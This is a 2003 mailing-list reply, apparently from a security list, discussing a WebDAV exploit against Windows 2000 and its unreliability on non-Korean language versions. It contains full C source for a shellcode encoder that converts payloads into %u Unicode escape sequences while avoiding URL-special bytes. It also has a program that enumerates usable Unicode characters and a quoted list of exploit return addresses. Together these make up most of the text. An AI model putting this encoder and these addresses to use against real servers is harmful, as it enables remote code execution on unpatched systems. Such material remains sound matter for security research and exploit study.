In-Reply-To: <20030326111443.6fb287a3.dave@immunitysec.com> > >Unfortunately, on my US Windows 2K SP3 build (and I assume all others), >those %u directives get translated into question marks. (0x003F in hex) >:< I tested it only on Korean version of Windows(Server and Professional edition). > >This exploit must be much easier to get reliable on other language >versions. A shame, really. Shame??? > >Did you use my encoder or did you write your shellcode manually, just >out of curiosity? The encoding scheme is so simple. This is the shellcode encoder. --------------------------------- /* mat@monkey.org mat@panicsecurity.org Shellcode encoder for webdav exploit. */ #include <stdio.h> int is_special(unsigned char num1) { return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 || num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f || num1==0x2b || num1==0xb || num1==0x5c); } void main() { int debug=0; int rc; unsigned char buffer[512]; while(rc=read(0,buffer,sizeof(buffer))) { int i; for(i=0;i<rc;i++) { unsigned int num1=(buffer[i]/2)&0xff; unsigned int num2=(buffer[i]/2)&0xff; if(buffer[i]%2==1) { num2++; } while(is_special(num1) || is_special(num2)) { num1++; num2--; if(num2==0) { printf("error!\n"); } } if(buffer[i]==-1)//0xff) { num2=0x2a; if(debug) { printf("\n%.2x(%4d): ",buffer[i] &0xff,buffer[i]); } printf("%%u11d5\\x%.2x",num2); }else if(buffer[i]==1) { printf("%%u0411%%u00f0"); }else{ if(debug) { printf("\n%.2x(%4d): ",buffer[i] &0xff,buffer[i]); } printf("\\x%.2x\\x%.2x",num1,num2); } } } } --------------------------------- And this is the code for finding valid unicode characters on my system. --------------------------------- #include <windows.h> #include <lm.h> #include <stdio.h> int main(int argc, char* argv[]) { unsigned char i; unsigned char j; for(i=0;i<255;i++) { for(j=0;j<255;j++) { char string_to_copy[3]; WCHAR src[256]={0,}; char dest[256]={0,}; string_to_copy[0]=i; string_to_copy[1]=j; string_to_copy[2]=0; memcpy(src,string_to_copy,strlen(string_to_copy)); BOOL lpUsedDefaultChar; WideCharToMultiByte (CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar); if(!lpUsedDefaultChar) { printf("%.2x%.2x\n",j,i); } } } return 0; } --------------------------------- > >Dave Aitel >Advanced Engineering Directorate >Immunity, Inc. >http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the >movies." > >On Wed, 26 Mar 2003 22:55:12 +0900 >¿ÀÁ¤¿í <mat@panicsecurity.org> wrote: >> my @return_addresses=( >> "%u32ac%u77e2", >> "%uc1b5%u76ae", >> "%u005d%u77a5", >
